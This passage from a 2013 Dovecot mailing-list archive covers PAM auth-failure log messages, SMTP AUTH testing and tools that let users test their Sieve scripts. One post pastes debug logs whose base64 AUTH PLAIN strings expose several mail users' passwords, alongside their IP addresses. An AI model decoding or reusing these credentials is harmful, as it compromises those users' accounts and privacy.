[kworker/0:0H] root 7 0.0 0.0 0 0 ? S< Jun04 0:00 [kworker/u:0H] root 8 0.0 0.0 0 0 ? S< Jun04 0:00 [cpuset] root 9 0.0 0.0 0 0 ? S< Jun04 0:00 [khelper] root 10 0.0 0.0 0 0 ? S Jun04 0:00 [kdevtmpfs] root 11 0.0 0.0 0 0 ? S< Jun04 0:00 [netns] root 12 0.0 0.0 0 0 ? S Jun04 0:00 [bdi-default] root 13 0.0 0.0 0 0 ? S< Jun04 0:00 [kintegrityd] root 14 0.0 0.0 0 0 ? S< Jun04 0:00 [kblockd] root 15 0.0 0.0 0 0 ? S Jun04 0:00 [khubd] root 16 0.0 0.0 0 0 ? S< Jun04 0:00 [md] root 17 0.0 0.0 0 0 ? S Jun04 0:00 [khungtaskd] root 18 0.0 0.0 0 0 ? S Jun04 0:24 [kswapd0] root 19 0.0 0.0 0 0 ? S Jun04 0:00 [fsnotify_mark] root 20 0.0 0.0 0 0 ? S< Jun04 0:00 [crypto] root 26 0.0 0.0 0 0 ? S< Jun04 0:00 [VCHIQ-0] root 27 0.0 0.0 0 0 ? S< Jun04 0:00 [VCHIQr-0] root 28 0.0 0.0 0 0 ? S< Jun04 0:00 [VCHIQs-0] root 29 0.0 0.0 0 0 ? S< Jun04 0:00 [bcm2708_spi.0] root 31 0.0 0.0 0 0 ? S< Jun04 0:00 [dwc_otg] root 32 0.0 0.0 0 0 ? S< Jun04 0:00 [DWC Notificatio] root 33 0.0 0.0 0 0 ? S< Jun04 0:00 [kmpathd] root 34 0.0 0.0 0 0 ? S< Jun04 0:00 [kmpath_handlerd] root 36 0.0 0.0 0 0 ? S< Jun04 0:00 [kvub300c] root 37 0.0 0.0 0 0 ? S< Jun04 0:00 [kvub300p] root 38 0.0 0.0 0 0 ? S< Jun04 0:00 [kvub300d] root 39 0.0 0.0 0 0 ? S Jun04 0:00 [mmcqd/0] root 40 0.0 0.0 0 0 ? S< Jun04 0:00 [deferwq] root 42 0.0 0.0 0 0 ? S< Jun04 0:20 [kworker/0:1H] root 43 0.0 0.0 0 0 ? S Jun04 0:00 [scsi_eh_0] root 44 0.0 0.0 0 0 ? S Jun04 2:20 [usb-storage] root 46 0.0 0.0 0 0 ? S Jun04 0:19 [jbd2/sda2-8] root 47 0.0 0.0 0 0 ? S< Jun04 0:00 [ext4-dio-unwrit] root 51 0.0 0.0 0 0 ? S Jun04 0:15 [flush-8:0] root 56 0.0 0.1 5048 888 ? Ss Jun04 0:01 /usr/lib/udev/udevd root 57 0.0 0.3 12996 1448 ? Ss Jun04 7:53 /usr/lib/systemd/systemd-journald root 58 0.0 0.0 0 0 ? S Jun04 0:01 [kauditd] root 219 0.0 0.0 0 0 ? S< Jun04 0:00 [kdmflush] root 220 0.0 0.0 0 0 ? S< Jun04 0:00 [kcryptd_io] root 221 0.0 0.0 0 0 ? S< Jun04 0:00 [kcryptd] root 232 0.0 0.0 0 0 ? S Jun04 0:04 [jbd2/dm-0-8] root 233 0.0 0.0 0 0 ? S< Jun04 0:00 [ext4-dio-unwrit] root 237 0.0 0.2 12312 912 ? S root 9425 0.1 0.0 0 0 ? Z 15:45 0:00 [trafic.py] vmail 9435 0.0 0.3 7024 1464 ? S 15:45 0:00 dovecot/imap vmail 9439 0.0 0.3 7024 1464 ? S 15:45 0:00 dovecot/imap vmail 9442 0.0 0.3 7024 1464 ? S 15:45 0:00 dovecot/imap vmail 9450 0.0 0.3 7024 1464 ? S 15:47 0:00 dovecot/imap vmail 9454 0.0 0.3 7024 1464 ? S 15:47 0:00 dovecot/imap vmail 9457 0.0 0.3 7024 1464 ? S 15:47 0:00 dovecot/imap root 9458 0.4 0.8 13252 3748 ? Ss 15:49 0:00 sshd: famille [priv] famille 9461 0.3 0.3 13252 1700 ? S 15:49 0:00 sshd: famille at pts/0 famille 9462 0.4 0.5 5820 2404 pts/0 Ss 15:49 0:00 -bash root 9482 0.0 0.4 6504 1908 pts/0 S 15:49 0:00 su - root 9486 1.4 0.5 5928 2608 pts/0 S 15:49 0:02 -bash root 9505 0.5 0.0 0 0 ? S 15:49 0:01 [kworker/0:2] root 9543 32.0 0.2 4708 1072 pts/0 R+ 15:52 0:00 ps auxw apache 31975 0.0 1.3 50996 6004 ? S Jun11 0:00 /usr/sbin/httpd -k start apache 31976 0.0 1.3 50996 6004 ? S Jun11 0:00 /usr/sbin/httpd -k start apache 31977 0.0 1.3 50996 6004 ? S Jun11 0:00 /usr/sbin/httpd -k start apache 31978 0.0 1.3 50996 6004 ? S Jun11 0:00 /usr/sbin/httpd -k start apache 31979 0.0 1.3 50996 6004 ? S Jun11 0:00 /usr/sbin/httpd -k start apache 31980 0.0 1.3 50996 6180 ? S Jun11 0:00 /usr/sbin/httpd -k start apache 31981 0.0 1.3 50996 6004 ? S Jun11 0:00 /usr/sbin/httpd -k start apache 31982 0.0 1.3 50996 6004 ? S Jun11 0:00 /usr/sbin/httpd -k start From waynea at clima-tech.com Fri Jun 14 18:45:36 2013 From: waynea at clima-tech.com (Wayne Andersen) Date: Fri, 14 Jun 2013 09:45:36 -0600 Subject: [Dovecot] Pam authentication failure message but it works Message-ID: <51BB3AA0.8080006@clima-tech.com> I am running Centos 6.4 64bit. Dovecot 2.0.9 I am getting the following messages in /var/log/secure, which looks like the pam authentication is not working but the users are allowed to login and the system works great. I am wondering if pam is actually failing and yet the system is getting the login info from elsewhere, or is this just a nuisance message? /var/log/secure Jun 12 23:11:29 smtp auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=christineg rhost=65.13.54.123 user=christineg Jun 12 23:11:45 smtp auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=susieg rhost=70.208.29.109 user=susieg Jun 12 23:12:03 smtp auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=bobs rhost=70.59.189.210 user=bobs In the debug log file I see what looks like a successful connection, but don't know how to read the two pam lines. /var/log/dovecot.debug.log Jun 12 23:11:29 auth: Debug: auth client connected (pid=10098) Jun 12 23:11:29 auth: Debug: client in: AUTH 1 PLAIN service=imap lip=206.169.228.24 rip=65.13.54.123 lport=143 rport=54049 resp=AGNocmlzZwBjZzQ4MjU= Jun 12 23:11:29 auth: Debug: pam(christineg,65.13.54.123): lookup service=dovecot Jun 12 23:11:29 auth: Debug: pam(christineg,65.13.54.123): #1/1 style=1 msg=Password: Jun 12 23:11:29 auth: Debug: client out: OK 1 user=christineg Jun 12 23:11:29 auth: Debug: master in: REQUEST 4079353857 10098 1 0229474c9c1038e161328ecd28884af2 Jun 12 23:11:29 auth: Debug: passwd(christineg,65.13.54.123): lookup Jun 12 23:11:29 auth: Debug: master out: USER 4079353857 christineg system_groups_user=christineg uid=1116 gid=100 home=/home/christineg Jun 12 23:11:29 imap(christineg): Debug: Effective uid=1116, gid=100, home=/home/christineg Jun 12 23:11:29 imap(christineg): Debug: maildir++: root=/home/christineg/Maildir, index=, control=, inbox=/home/christineg/Maildir Jun 12 23:11:44 auth: Debug: auth client connected (pid=10100) Jun 12 23:11:45 auth: Debug: client in: AUTH 1 PLAIN service=imap lip=206.169.228.24 rip=70.208.29.109 lport=143 rport=14107 Jun 12 23:11:45 auth: Debug: client out: CONT 1 Jun 12 23:11:45 auth: Debug: client in: CONT 1 AHJpY2hhcmRnQGNsaW1hLXRlY2guY29tAHJnMzgyMg== Jun 12 23:11:45 auth: Debug: pam(susieg,70.208.29.109): lookup service=dovecot Jun 12 23:11:45 auth: Debug: pam(susieg,70.208.29.109): #1/1 style=1 msg=Password: Jun 12 23:11:45 auth: Debug: client out: OK 1 user=susieg Jun 12 23:11:45 auth: Debug: master in: REQUEST 3368157185 10100 1 5a8d4b15a417d0bc4d2f818c5a5710f0 Jun 12 23:11:45 auth: Debug: passwd(susieg,70.208.29.109): lookup Jun 12 23:11:45 auth: Debug: master out: USER 3368157185 susieg system_groups_user=susieg uid=1087 gid=100 home=/home/susieg Jun 12 23:11:45 imap(susieg): Debug: Effective uid=1087, gid=100, home=/home/susieg Jun 12 23:11:45 imap(susieg): Debug: maildir++: root=/home/susieg/Maildir, index=, control=, inbox=/home/susieg/Maildir Jun 12 23:12:03 auth: Debug: auth client connected (pid=10104) Jun 12 23:12:03 auth: Debug: auth client connected (pid=10105) Jun 12 23:12:03 auth: Debug: client in: AUTH 1 PLAIN service=imap lip=206.169.228.24 rip=70.59.189.210 lport=143 rport=38705 Jun 12 23:12:03 auth: Debug: client out: CONT 1 Jun 12 23:12:03 auth: Debug: client in: CONT 1 AGJyZW5kb25jQGNsaW1hLXRlY2guY29tAGJjMTU1NA== Jun 12 23:12:03 auth: Debug: pam(bobs,70.59.189.210): lookup service=dovecot Jun 12 23:12:03 auth: Debug: pam(bobs,70.59.189.210): #1/1 style=1 msg=Password: Jun 12 23:12:03 auth: Debug: client out: OK 1 user=bobs Jun 12 23:12:03 auth: Debug: master in: REQUEST 709623809 10104 1 0c261d849b956bf9cb5c0833b498bb97 Jun 12 23:12:03 auth: Debug: passwd(bobs,70.59.189.210): lookup Jun 12 23:12:03 auth: Debug: master out: USER 709623809 bobs system_groups_user=bobs uid=1188 gid=100 home=/home/bobs Jun 12 23:12:03 imap(bobs): Debug: Effective uid=1188, gid=100, home=/home/bobs Jun 12 23:12:03 imap(bobs): Debug: maildir++: root=/home/bobs/Maildir, index=, control=, inbox=/home/bobs/Maildir /etc/pam.d/dovecot #%PAM-1.0 auth required pam_nologin.so auth include password-auth account include password-auth session include password-auth # 2.0.9: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-279.22.1.el6.x86_64 x86_64 CentOS release 6.4 (Final) auth_debug_passwords = yes auth_mechanisms = plain login auth_username_format = %n auth_verbose = yes debug_log_path = /var/log/dovecot.debug.log disable_plaintext_auth = no hostname = mail.mydomain.com lda_mailbox_autocreate = yes lda_mailbox_autosubscribe = yes mail_debug = yes mail_location = maildir:~/Maildir managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date mbox_write_locks = fcntl passdb { args = failure_show_msg=yes driver = pam } plugin { sieve = ~/.dovecot.sieve sieve_dir = ~/sieve sieve_global_path = /var/lib/dovecot/sieve/default.sieve } postmaster_address = postmaster at mydomain.com protocols = imap pop3 lmtp sieve sendmail_path = /usr/sbin/sendmail.postfix service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } } ssl_cert = From ben at morrow.me.uk Fri Jun 14 19:06:36 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Fri, 14 Jun 2013 17:06:36 +0100 Subject: [Dovecot] quota-status not working in distributed environment In-Reply-To: <201306140815.29338.benoit.panizzon@imp.ch> References: <201306131214.04765.benoit.panizzon@imp.ch> <20130613150749.GE58518@anubis.morrow.me.uk> <201306140815.29338.benoit.panizzon@imp.ch> Message-ID: <20130614160636.GF58518@anubis.morrow.me.uk> At 8AM +0200 on 14/06/13 you (Benoit Panizzon) wrote: > > It's quite simple (compared with sendmail milter). I will directly > connect to the policy service on the correct machine from wihtin the > milter. The milter has to do a database query anyway so I get the > mailbox hostname in the same query. So I can do a IO::Socket::INET > connect to the right machine which knows the quota of that recipient. > > Btw, the quota-status just return DUNNO or 'Quota Full'. Is there a > similar easy way to check the ammount of quota used? I could then > update that information in the database and use it to, for example > find abandoned mailboxes. Not as far as I know, but if you're talking to a database anyway why not get Dovecot to store its quota information in the database directly (see wiki2/Quota/Dict)? That way you don't need to talk to Dovecot at all. Ben From raabe at froglogic.com Fri Jun 14 19:40:52 2013 From: raabe at froglogic.com (Frerich Raabe) Date: Fri, 14 Jun 2013 09:40:52 -0700 Subject: [Dovecot] Allowing clients to test their Sieve scripts Message-ID: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> Hi, One thing which came up repeatedly is that clients using the IMAP server I run (using Dovecot 2.1) wonder whether they broke their Sieve scripts, i.e. it often goes like "I don't know whether I just didn't receive any mail, or whether my filters broke. Can you check the logs?". I then usually just run the sieve-test binary (part of the Pigeonhole distribution) and send them the output. However, I was wondering - is there maybe a way for them to try it themselves? Like, maybe a tiny web server which just prints a form asking for a mail file and a sieve script, and then it runs sieve-script and prints the output of that? I wonder how other people do that. -- Frerich Raabe - raabe at froglogic.com www.froglogic.com - Multi-Platform GUI Testing From me at staticsafe.ca Fri Jun 14 19:50:35 2013 From: me at staticsafe.ca (staticsafe) Date: Fri, 14 Jun 2013 12:50:35 -0400 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> Message-ID: <20130614165035.GA4468@uriel.asininetech.com> On Fri, Jun 14, 2013 at 09:40:52AM -0700, Frerich Raabe wrote: > Hi, > > One thing which came up repeatedly is that clients using the IMAP server I run (using Dovecot 2.1) wonder whether they broke their Sieve scripts, i.e. it often goes like "I don't know whether I just didn't receive any mail, or whether my filters broke. Can you check the logs?". > > I then usually just run the sieve-test binary (part of the Pigeonhole distribution) and send them the output. However, I was wondering - is there maybe a way for them to try it themselves? Like, maybe a tiny web server which just prints a form asking for a mail file and a sieve script, and then it runs sieve-script and prints the output of that? I wonder how other people do that. > > -- > Frerich Raabe - raabe at froglogic.com > www.froglogic.com - Multi-Platform GUI Testing > > > > > > The ManageSieve plugin in Thunderbird does basic syntax checks, to check if your Sieve script does what it is supposed to to do, there is something like this - https://www.fastmail.fm/docs/sieve/sievetest.php -- staticsafe O< ascii ribbon campaign - stop html mail - www.asciiribbon.org Please don't top post. Please don't CC! I'm subscribed to whatever list I just posted on. From thomas-lists at nybeta.com Fri Jun 14 19:50:39 2013 From: thomas-lists at nybeta.com (Thomas Harold) Date: Fri, 14 Jun 2013 12:50:39 -0400 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> Message-ID: <51BB49DF.8060202@nybeta.com> On 6/14/2013 12:40 PM, Frerich Raabe wrote: > Hi, > > One thing which came up repeatedly is that clients using the IMAP server I run (using Dovecot 2.1) wonder whether they broke their Sieve scripts, i.e. it often goes like "I don't know whether I just didn't receive any mail, or whether my filters broke. Can you check the logs?". > > I then usually just run the sieve-test binary (part of the Pigeonhole distribution) and send them the output. However, I was wondering - is there maybe a way for them to try it themselves? Like, maybe a tiny web server which just prints a form asking for a mail file and a sieve script, and then it runs sieve-script and prints the output of that? I wonder how other people do that. > If you have Thunderbird, you may want to have them try out the Sieve plug-in available at http://sieve.mozdev.org/ It auto-compiles and displays errors in the edit window. The other thing we do is use RoundCube webmail (which has a sieve plugin) and have our users edit their sieve scripts through that instead. It's a form-based rules editor, so a bit harder for them to goof it up. From symbiat at gmail.com Fri Jun 14 19:56:29 2013 From: symbiat at gmail.com (Ajai Khattri) Date: Fri, 14 Jun 2013 12:56:29 -0400 Subject: [Dovecot] Testing SMTP AUTH Message-ID: Ive configured Postfix to use Dovecot for SMTP AUTH. I tried to test it but when I send the AUTH LOGIN command I get a response saying that AUTH method is not supported/implemented. How to test then? -- A -- Aj. From ben at indietorrent.org Fri Jun 14 20:11:37 2013 From: ben at indietorrent.org (Ben Johnson) Date: Fri, 14 Jun 2013 13:11:37 -0400 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <51BB49DF.8060202@nybeta.com> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <51BB49DF.8060202@nybeta.com> Message-ID: <51BB4EC9.70406@indietorrent.org> On 6/14/2013 12:50 PM, Thomas Harold wrote: > On 6/14/2013 12:40 PM, Frerich Raabe wrote: >> Hi, >> >> One thing which came up repeatedly is that clients using the IMAP >> server I run (using Dovecot 2.1) wonder whether they broke their Sieve >> scripts, i.e. it often goes like "I don't know whether I just didn't >> receive any mail, or whether my filters broke. Can you check the logs?". >> >> I then usually just run the sieve-test binary (part of the Pigeonhole >> distribution) and send them the output. However, I was wondering - is >> there maybe a way for them to try it themselves? Like, maybe a tiny >> web server which just prints a form asking for a mail file and a sieve >> script, and then it runs sieve-script and prints the output of that? I >> wonder how other people do that. >> > > If you have Thunderbird, you may want to have them try out the Sieve > plug-in available at http://sieve.mozdev.org/ > > It auto-compiles and displays errors in the edit window. > > The other thing we do is use RoundCube webmail (which has a sieve > plugin) and have our users edit their sieve scripts through that > instead. It's a form-based rules editor, so a bit harder for them to > goof it up. > One of the obvious limitations of using the Thunderbird plug-in, or the web-based tool as cited, is that neither one has any way to know which Sieve modules have been "require"d. Oftentimes fatal errors result from referencing a module that hasn't been required. It seems as though the only truly reliable method would be to validate the scripts in consideration of your own environment. As you suggested, a simple Web form (ideally, one that requires authentication) into which users can paste scripts and email bodies would do the job. The form inputs can then be passed to sieve-test. Needless to say, the form inputs should be escaped very carefully to prevent arbitrary code from being executed on your system. Also, I second the Roundcube suggestion If your system supports Roundcube, or if you already use it. The form-based rule editor is much harder to screw-up, as Thomas noted. Good luck! -Ben From p at sys4.de Fri Jun 14 20:13:24 2013 From: p at sys4.de (Patrick Ben Koetter) Date: Fri, 14 Jun 2013 19:13:24 +0200 Subject: [Dovecot] Testing SMTP AUTH In-Reply-To: References: Message-ID: <20130614171323.GA5136@sys4.de> * Ajai Khattri : > Ive configured Postfix to use Dovecot for SMTP AUTH. > > I tried to test it but when I send the AUTH LOGIN command I get a response > saying that AUTH method is not supported/implemented. How to test then? What do you get when you run this: # dovecot -n | grep auth_mechanisms -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From ben at indietorrent.org Fri Jun 14 20:16:08 2013 From: ben at indietorrent.org (Ben Johnson) Date: Fri, 14 Jun 2013 13:16:08 -0400 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <51BB4EC9.70406@indietorrent.org> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <51BB49DF.8060202@nybeta.com> <51BB4EC9.70406@indietorrent.org> Message-ID: <51BB4FD8.3090605@indietorrent.org> On 6/14/2013 1:11 PM, Ben Johnson wrote: > One of the obvious limitations of using the Thunderbird plug-in, or the > web-based tool as cited, is that neither one has any way to know which > Sieve modules have been "require"d. Oftentimes fatal errors result from > referencing a module that hasn't been required. I stand corrected; the Thunderbird plug-in (which I hadn't tried until just now) does actually connect to the server, so it will know which modules are enabled in the configuration. Neat! Thanks for the tip, Thomas! -Ben From symbiat at gmail.com Fri Jun 14 20:31:03 2013 From: symbiat at gmail.com (Ajai Khattri) Date: Fri, 14 Jun 2013 13:31:03 -0400 Subject: [Dovecot] Testing SMTP AUTH In-Reply-To: <20130614171323.GA5136@sys4.de> References: <20130614171323.GA5136@sys4.de> Message-ID: On Friday, June 14, 2013, Patrick Ben Koetter wrote: > > > What do you get when you run this: > > # dovecot -n | grep auth_mechanisms I get nothing back so I guess that needs to be configured. I'm using a virtual passwd file for POP3/IMAP auth. -- A -- Aj. From p at sys4.de Fri Jun 14 20:44:03 2013 From: p at sys4.de (Patrick Ben Koetter) Date: Fri, 14 Jun 2013 19:44:03 +0200 Subject: [Dovecot] Testing SMTP AUTH In-Reply-To: References: <20130614171323.GA5136@sys4.de> Message-ID: <20130614174403.GC5136@sys4.de> * Ajai Khattri : > On Friday, June 14, 2013, Patrick Ben Koetter wrote: > > > > > > What do you get when you run this: > > > > # dovecot -n | grep auth_mechanisms > > > I get nothing back so I guess that needs to be configured. I'm using a > virtual passwd file for POP3/IMAP auth. Have you read Postfix' SASL_README? It should tell you what needs to be done on Postfix and Dovecot side. p at rick -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From raabe at froglogic.com Fri Jun 14 20:53:20 2013 From: raabe at froglogic.com (Frerich Raabe) Date: Fri, 14 Jun 2013 10:53:20 -0700 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <51BB49DF.8060202@nybeta.com> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <51BB49DF.8060202@nybeta.com> Message-ID: On Jun 14, 2013, at 9:50 AM, Thomas Harold wrote: > On 6/14/2013 12:40 PM, Frerich Raabe wrote: >> Hi, >> >> One thing which came up repeatedly is that clients using the IMAP server I run (using Dovecot 2.1) wonder whether they broke their Sieve scripts, i.e. it often goes like "I don't know whether I just didn't receive any mail, or whether my filters broke. Can you check the logs?". >> >> I then usually just run the sieve-test binary (part of the Pigeonhole distribution) and send them the output. However, I was wondering - is there maybe a way for them to try it themselves? Like, maybe a tiny web server which just prints a form asking for a mail file and a sieve script, and then it runs sieve-script and prints the output of that? I wonder how other people do that. >> > > If you have Thunderbird, you may want to have them try out the Sieve plug-in available at http://sieve.mozdev.org/ > > It auto-compiles and displays errors in the edit window. > > The other thing we do is use RoundCube webmail (which has a sieve plugin) and have our users edit their sieve scripts through that instead. It's a form-based rules editor, so a bit harder for them to goof it up. Thanks for your response (and the others who responded to this thread!). I also have RoundCube setup and indeed many people use that, since you can even switch to an 'Advanced Mode' in the editor in which you just get the raw Sieve script to edit in a text editor. However, I wasn't primarily thinking of syntax errors but rather logic errors in the script, like "Why did this mail get discarded?" or "Why did this mail end up in folder XYZ?". sieve-test can at least print a nice description (and I seem to recall you could even get some verbose output from it so that you could see all the decisions it took). -- Frerich Raabe - raabe at froglogic.com www.froglogic.com - Multi-Platform GUI Testing From ben at morrow.me.uk Fri Jun 14 21:07:45 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Fri, 14 Jun 2013 19:07:45 +0100 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> Message-ID: <20130614180745.GG58518@anubis.morrow.me.uk> At 9AM -0700 on 14/06/13 you (Frerich Raabe) wrote: > > One thing which came up repeatedly is that clients using the IMAP > server I run (using Dovecot 2.1) wonder whether they broke their Sieve > scripts, i.e. it often goes like "I don't know whether I just didn't > receive any mail, or whether my filters broke. Can you check the > logs?". > > I then usually just run the sieve-test binary (part of the Pigeonhole > distribution) and send them the output. However, I was wondering - is > there maybe a way for them to try it themselves? Like, maybe a tiny > web server which just prints a form asking for a mail file and a sieve > script, and then it runs sieve-script and prints the output of that? I > wonder how other people do that. Simply providing some way for them to read the .dovecot.sieve.log file created in their home directory would be a good start. If there are any problems with delivery they will be logged there. You could set up some sort of web access, or even have a daily cronjob to mail the file to the user if it isn't empty. Ben From raabe at froglogic.com Fri Jun 14 21:11:49 2013 From: raabe at froglogic.com (Frerich Raabe) Date: Fri, 14 Jun 2013 11:11:49 -0700 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <20130614180745.GG58518@anubis.morrow.me.uk> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> Message-ID: On Jun 14, 2013, at 11:07 AM, Ben Morrow wrote: > At 9AM -0700 on 14/06/13 you (Frerich Raabe) wrote: >> >> One thing which came up repeatedly is that clients using the IMAP >> server I run (using Dovecot 2.1) wonder whether they broke their Sieve >> scripts, i.e. it often goes like "I don't know whether I just didn't >> receive any mail, or whether my filters broke. Can you check the >> logs?". >> >> I then usually just run the sieve-test binary (part of the Pigeonhole >> distribution) and send them the output. However, I was wondering - is >> there maybe a way for them to try it themselves? Like, maybe a tiny >> web server which just prints a form asking for a mail file and a sieve >> script, and then it runs sieve-script and prints the output of that? I >> wonder how other people do that. > > Simply providing some way for them to read the .dovecot.sieve.log file > created in their home directory would be a good start. If there are any > problems with delivery they will be logged there. You could set up some > sort of web access, or even have a daily cronjob to mail the file to the > user if it isn't empty. .dovecot.sieve.log really only contains errors, right? Like, trying to fail mail into folders with invalid characters in them or so? I would need something which explains how a given Sieve script is executed for a given mail. -- Frerich Raabe - raabe at froglogic.com www.froglogic.com - Multi-Platform GUI Testing From ben at indietorrent.org Fri Jun 14 21:42:51 2013 From: ben at indietorrent.org (Ben Johnson) Date: Fri, 14 Jun 2013 14:42:51 -0400 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> Message-ID: <51BB642B.1080908@indietorrent.org> On 6/14/2013 2:11 PM, Frerich Raabe wrote: > > On Jun 14, 2013, at 11:07 AM, Ben Morrow wrote: > >> At 9AM -0700 on 14/06/13 you (Frerich Raabe) wrote: >>> >>> One thing which came up repeatedly is that clients using the IMAP >>> server I run (using Dovecot 2.1) wonder whether they broke their Sieve >>> scripts, i.e. it often goes like "I don't know whether I just didn't >>> receive any mail, or whether my filters broke. Can you check the >>> logs?". >>> >>> I then usually just run the sieve-test binary (part of the Pigeonhole >>> distribution) and send them the output. However, I was wondering - is >>> there maybe a way for them to try it themselves? Like, maybe a tiny >>> web server which just prints a form asking for a mail file and a sieve >>> script, and then it runs sieve-script and prints the output of that? I >>> wonder how other people do that. >> >> Simply providing some way for them to read the .dovecot.sieve.log file >> created in their home directory would be a good start. If there are any >> problems with delivery they will be logged there. You could set up some >> sort of web access, or even have a daily cronjob to mail the file to the >> user if it isn't empty. > > .dovecot.sieve.log really only contains errors, right? Like, trying to > fail mail into folders with invalid characters in them or so? I would > need something which explains how a given Sieve script is executed for > a given mail. > Sounds as though you've answered your own question. You probably need to build some type of Web interface for sieve-test that is well-secured and well-escaped. -Ben From raabe at froglogic.com Fri Jun 14 22:06:21 2013 From: raabe at froglogic.com (Frerich Raabe) Date: Fri, 14 Jun 2013 12:06:21 -0700 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <51BB642B.1080908@indietorrent.org> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> <51BB642B.1080908@indietorrent.org> Message-ID: <93204BBB-3005-4757-92C3-3D040AB49020@froglogic.com> On Jun 14, 2013, at 11:42 AM, Ben Johnson wrote: > Sounds as though you've answered your own question. You probably need to > build some type of Web interface for sieve-test that is well-secured and > well-escaped. Looks like it. Kinda surprising that nobody else needed this, though - I wouldn't have thought it's than uncommon a requirement. :-) OTOH, that's some incentive for me to write something which is reasonably reusable as opposed to being specific to my particular setup. -- Frerich Raabe - raabe at froglogic.com www.froglogic.com - Multi-Platform GUI Testing From ben at indietorrent.org Fri Jun 14 22:22:42 2013 From: ben at indietorrent.org (Ben Johnson) Date: Fri, 14 Jun 2013 15:22:42 -0400 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <93204BBB-3005-4757-92C3-3D040AB49020@froglogic.com> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> <51BB642B.1080908@indietorrent.org> <93204BBB-3005-4757-92C3-3D040AB49020@froglogic.com> Message-ID: <51BB6D82.9070706@indietorrent.org> On 6/14/2013 3:06 PM, Frerich Raabe wrote: > > On Jun 14, 2013, at 11:42 AM, Ben Johnson wrote: >> Sounds as though you've answered your own question. You probably need to >> build some type of Web interface for sieve-test that is well-secured and >> well-escaped. > > Looks like it. Kinda surprising that nobody else needed this, though - I > wouldn't have thought it's than uncommon a requirement. :-) > > OTOH, that's some incentive for me to write something which is reasonably > reusable as opposed to being specific to my particular setup. > Please do keep us posted if you decide to pursue the endeavor. I've needed this, too, but it never bubbled up to the top of the priorities list. The complexities associated with authentication will be the most difficult part (at least if you want to build something reusable). Ideally, authentication could be handled outside of the application/script, e.g., by the Web-server. That would save you a lot of coding and make the application far more portable. Maybe I'll take a stab at this in PHP and share the results. -Ben From thomas-lists at nybeta.com Fri Jun 14 22:28:02 2013 From: thomas-lists at nybeta.com (Thomas Harold) Date: Fri, 14 Jun 2013 15:28:02 -0400 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <20130614180745.GG58518@anubis.morrow.me.uk> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> Message-ID: <51BB6EC2.20006@nybeta.com> On 6/14/2013 2:07 PM, Ben Morrow wrote: > > Simply providing some way for them to read the .dovecot.sieve.log file > created in their home directory would be a good start. If there are any > problems with delivery they will be logged there. You could set up some > sort of web access, or even have a daily cronjob to mail the file to the > user if it isn't empty. > What about having sieve add a x-rules-fired header and adding that to the message? From tss at iki.fi Fri Jun 14 22:30:09 2013 From: tss at iki.fi (Timo Sirainen) Date: Fri, 14 Jun 2013 22:30:09 +0300 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <51BB6D82.9070706@indietorrent.org> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> <51BB642B.1080908@indietorrent.org> <93204BBB-3005-4757-92C3-3D040AB49020@froglogic.com> <51BB6D82.9070706@indietorrent.org> Message-ID: <6F4DB367-02C2-4BE5-9FE8-BDE790070543@iki.fi> On 14.6.2013, at 22.22, 